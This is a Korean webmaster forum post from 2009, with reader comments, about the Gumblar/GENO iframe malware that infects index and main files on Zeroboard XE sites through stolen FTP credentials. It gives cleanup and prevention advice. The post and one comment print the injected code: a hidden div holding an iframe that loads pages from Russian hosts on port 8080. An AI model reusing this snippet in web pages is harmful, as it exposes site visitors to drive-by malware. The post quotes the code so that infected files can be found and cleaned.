웹마스터 팁
iframe을 이용한 악성코드 침투 - 치료 및 대응법 (검블러 or GENO)
2009.10.01 01:29
마땅히 어느 게시판에 올려야할지 몰라서 이곳에 올립니다...
후에 마땅한 자리를 찾으면 옮기겠습니다. (그래도 좋은 정보 들고온거니 이해해주세요...ㄷㄷㄷ)
현재 제로보드XE를 포함한 서버 자체에 iframe을 이용한 악성코드가 침투하고 있습니다.
검블러 혹은 GENO라는 이름을 가지고 있다는데요. 저는 뭐 그것까진 잘 모르겠고.. (그래봤자 악성코드나 바이러스죠. 흥)
제가 직접 당한 일이라서, 혹시 저와 같은 분이 있으실까 해서 적어봅니다.
갑자기 사이트가 뜨지 않으시는 분. (제 경우에는 이런 증상이 있었습니다만, 다양하게 나타날수 잇겠죠)
혹은 사이트에 왠 낯선 iframe 창이 뜨시는 분들.
이 악성코드는
파일명에 index 나 main 이 들어가면 모조리 다 침투하는 경향이 있어서 굉장히 골머리 썩습니다.
특히, 제로보드XE 깔린채로 이 악성코드에 걸리면...
제로보드XE 폴도 내에 설치되어있는 main.html, index.html (혹은 main 이나 index 글자가 포함된 파일 통틀어) 갯수만 해도.... 수십개...덜덜덜..... 정말 눈물이 앞을 가립니다.
일일이 지워줘야 하니깐요..... (재설치하는 방법도 있긴 있습니다만..........후.......그것도 심장 떨리죠.)
그리고 이 악성코드가 더 악질적인 이유가 한가지 더 있습니다.
FTP 접속 아이디가 두개 있는데...
어떤 루트에서 이 악성코드가 침투해서... 제 PC에 머물러있다가,
제 PC에서 FTP 접속 아이디와 비밀번호를 빼내어 가서.. 모두 걸리게 한다는 거죠.
예를 들어, FTP 아이디가 5개 있으면 5군데 다 걸린다는 겁니다. (-_-)
들은 얘기에 의하면 Adobe사의 아크로뱃과 플래시를 최신 보안패치 하지 않아, 그 취약점을 통해 쉽게 걸린다죠.
그러니 혹시 저 프로그램 사용하시는 분들 있으시다면 최신으로 업데이트 해주시고,
꼭 V3로 검사하시길 바랍니다.
iframe 악성코드에 대한 방어법 (제가 아는대로 적겠습니다.)
1. FTP 비밀번호를 자주자주 바꿉니다.
2. Adobe 사 프로그램 (아크로뱃, 플래시 위주)을 최신으로 업데이트(보안 패치) 해줍니다.
3. PC에 V3를 깔아 바이러스나 악성코드 검사를 반드시 해줍니다.
4. 홈페이지에 제로보드나 그누보드 등 이용하는 프로그램에 있어서도 최신 보안 패치를 해줍니다.
iframe를 통한 악성코드 치료법 (검블러 or GENO)
사용하는 서버에 main 이나 index 가 들어가는 모든 파일에서, 제가 밑에 첨부해 드리는 소스가 들어간 부분은 모두 삭제하셔야합니다.
(이하 메모장으로도 첨부했습니다.)
-> 이 아래는 악성코드 소스입니다!!!!!!!!!!!!!!!!!! (URL 절대 클릭하지 마시구요)
메모장에 저장해서 파일로도 첨부했습니다.
컨트롤+F 하셔서... iframe 이나 8080 검색해보시면.. 쉽게 찾을 수 있겠죠.
./public_html/zbxe/files/cache/template_compiled/e09705904ff83534dced736b381b505c.compiled.php:<div style="display:none">qnmajgnmmfkcuzgiiqoqllhjqbmencd<iframe width=950 height=869 src="./http://sexfinish.ru:8080/index.php" ></iframe></div>
./public_html/zbxe/files/cache/template_compiled/76cf47e9f1ad0fc481594e3352aecf83.compiled.php:<div style="display:none">qnmajgnmmfkcuzgiiqoqllhjqbmencd<iframe width=950 height=869 src="./http://sexfinish.ru:8080/index.php" ></iframe></div>
./public_html/zbxe/common/tpl/default_layout.html:<div style="display:none">qnmajgnmmfkcuzgiiqoqllhjqbmencd<iframe width=950 height=869 src="./http://sexfinish.ru:8080/index.php" ></iframe></div>
./public_html/zbxe/modules/board/tpl/index.html:<div style="display:none">qnmajgnmmfkcuzgiiqoqllhjqbmencd<iframe width=950 height=869 src="./http://sexfinish.ru:8080/index.php" ></iframe></div>
./public_html/zbxe/modules/importer/tpl/index.html:<div style="display:none">qnmajgnmmfkcuzgiiqoqllhjqbmencd<iframe width=950 height=869 src="./http://sexfinish.ru:8080/index.php" ></iframe></div>
./public_html/zbxe/modules/krzip/tpl/index.html:<div style="display:none">qnmajgnmmfkcuzgiiqoqllhjqbmencd<iframe width=950 height=869 src="./http://sexfinish.ru:8080/index.php" ></iframe></div>
./public_html/zbxe/modules/layout/tpl/index.html:<div style="display:none">qnmajgnmmfkcuzgiiqoqllhjqbmencd<iframe width=950 height=869 src="./http://sexfinish.ru:8080/index.php" ></iframe></div>
./public_html/zbxe/modules/counter/tpl/index.html:<div style="display:none">qnmajgnmmfkcuzgiiqoqllhjqbmencd<iframe width=950 height=869 src="./http://sexfinish.ru:8080/index.php" ></iframe></div>
./public_html/zbxe/modules/admin/tpl/index.html:<div style="display:none">qnmajgnmmfkcuzgiiqoqllhjqbmencd<iframe width=950 height=869 src="./http://sexfinish.ru:8080/index.php" ></iframe></div>
./public_html/zbxe/modules/ldap/tpl/index.html:<div style="display:none">qnmajgnmmfkcuzgiiqoqllhjqbmencd<iframe width=950 height=869 src="./http://sexfinish.ru:8080/index.php" ></iframe></div>
./public_html/zbxe/modules/integration_search/tpl/index.html:<div style="display:none">qnmajgnmmfkcuzgiiqoqllhjqbmencd<iframe width=950 height=869 src="./http://sexfinish.ru:8080/index.php" ></iframe></div>
./public_html/zbxe/modules/integration_search/skins/default/index.html:<div style="display:none">qnmajgnmmfkcuzgiiqoqllhjqbmencd<iframe width=950 height=869 src="./http://sexfinish.ru:8080/index.php" ></iframe></div>
./public_html/zbxe/modules/communication/tpl/index.html:<div style="display:none">qnmajgnmmfkcuzgiiqoqllhjqbmencd<iframe width=950 height=869 src="./http://sexfinish.ru:8080/index.php" ></iframe></div>
여러분...
이 악성코드 조심합니다....
제로보드xe 깔린 상태에서 걸리면.... 어마어마한 일을 치루시게 됩니다... 덜덜덜....
전 다행히 새로 오픈한지라.. 자료가 없어서 삭제하고 새로 깔면 되지만.......
자료 보존하셔야 하는 분들은... 이거 엄청난 일입니다. 그야말로 막노동......
후에 새로운 정보가 생기거든 또 수정하겠습니다.
(_ _) 부디 악성코드로부터 건재하시길...
댓글 8
-
파산팩토리
2009.10.01 09:48
xpressengine의 경우 관리자가 아닌 이상 iframe 태그는 먹히지 않도록 되어 있을텐데.. -
미루819
2009.10.01 12:53
관리자 아이디와 비밀번호를 빼내어가서 접속하여 침투합니다.
-
얼터1.0
2009.10.01 14:55
"관리자 아이디와 비밀번호를 빼내어가서" → 이 부분에서 항복!!!! ㅎ
게시물이나 메뉴 삭제안하고 iframe만 넣어주니 나름 고마울 따름...
-
네온
2009.10.07 11:26
제가 관리하는 사이트도 2개나 걸려서...
호스팅 회사에 따지라고 했는데
오늘 서버호스팅해서 관리해 주는 서버가 걸렸습니다.
이거 뭐...
서버 FTP 비번을 수시로 바꿔줘야 하나...
<div style="display:none">xzoufjahgdndzgwkcaxbqsuvhqpmjbn<iframe width=702 height=652 src="http://bio-free.ru:8080/index.php" ></iframe></div>
이런게 모든 index.htm/html/php 에 다 들어가 있습니다.
다행히 main.@@@에는 없었습니다.
-
php,cgi어렵네
2009.10.08 10:30
저의 경험으로는
금융기관 홈피에 접속해 있는 상태에서(키보드 보안프로그램등을 타고 들어오는듯) FTP 로 서버 접속해 있을때,
제트오디오 켜 놓은 상태에서 FTP 로 서버 접속해 있을때 감염이 된적이 있습니다.
그때마다 두개의 저의 홈 서버가 모두 감염이 되었던 적이 있습니다.
그후로는 키보드 보안프로그램이(엔프로텍터 등등)이나 제트오디오 윈앰프등이 실행된 상태에서는 FTP 돌리지 않습니다.
-
chohee
2010.03.03 13:21
정말 기가 막히네요...제발 그딴짓 좀 안했으면......좋넸네요~
저같은 초보들은 읽기만 해도 가슴이 떨립니다.
-
쥬시쿨
2010.04.28 01:57
젠장..... 4에서 .. 이런 악성코드때문에 xe로 옮기는데... ㅡㅡ;; xe 도 ..별수가 없는거군요 ㅡㅡ;;
아.... 답답하다...
3달동안 공격받았었는데 ..ㅡㅡ;;
아직 이전도 안끝났는데...아..걱정이다...
-
키스미베이베
2012.09.18 00:12
혹시 아직 xe하시면 대댓글좀 달아주세요 ㅠㅠ
제목 | 글쓴이 | 날짜 |
---|---|---|
Admin 페이지에서 사이트맵 삭제가 안될 때 | FontBox | 2012.10.06 |
회원설정에 레이아웃 설정이 생겼습니다. 회원정보보기페이지 레이아웃 설정 가능 [2] | 똑디 | 2012.10.04 |
youtube, vimeo 자동 썸네일 생성 팁 1.5 이상 [3] | 꿈틀잉 | 2012.09.19 |
iframe 아이프레임 투명처리 | 꿈틀잉 | 2012.10.04 |
실시간 쪽지 [10] | CMD | 2012.09.20 |
제목 부분에 특수키 입력 못하게 막는 방법 [22] | sejin7940 | 2012.09.21 |
[초보팁] 게시판 하단 버튼 정리 [2] | 브레인630 | 2012.09.24 |
UTF-8에서 호환되는 사랑비 BGM 올립니다. [8] | 로로아 | 2008.10.15 |
XE스팸필터 등록 오류(1.5.3.2 적용후) [10] | 정박사닷컴 | 2012.09.11 |
관리자의 회원정보 수정 페이지에 '가입일/최근접속일' 추가하기 [6] | showjean | 2012.09.17 |
iframe을 이용한 악성코드 침투 - 치료 및 대응법 (검블러 or GENO) [8] | 미루819 | 2009.10.01 |
친절한설명! 자신의홈페이지에 간단히 음악넣기 [10] | 준봉쿠 | 2011.12.18 |
인증메일 때문에 고생하시는 분 참고하세요. [17] | 박용식 | 2010.10.14 |
1.4 에서 1.5로 게시판 마이그레이션 팁 [12] | 마음의빈자리 | 2012.07.10 |
DB네임(테이블 프리픽스) 변경 방법 phpmyadmin | 꿈틀잉 | 2012.09.12 |
startssl 에 가입하고 패널 들어갈때 인증서 못받으신분들 | 우리아기 | 2012.09.12 |
인증메일 에러 나시는 분께 드리는 글 | sorigongan | 2012.09.11 |
글 드래그, 오른쪽마우스, 글복사 한번에 막는방법 [6] | 리엔필드 | 2012.06.05 |
iframe 깨는 스크립트 입니다. [4] | HB | 2012.09.01 |
사이트 공사할 때 임시로 다른 페이지 보여주기 | 하늘종 | 2012.09.03 |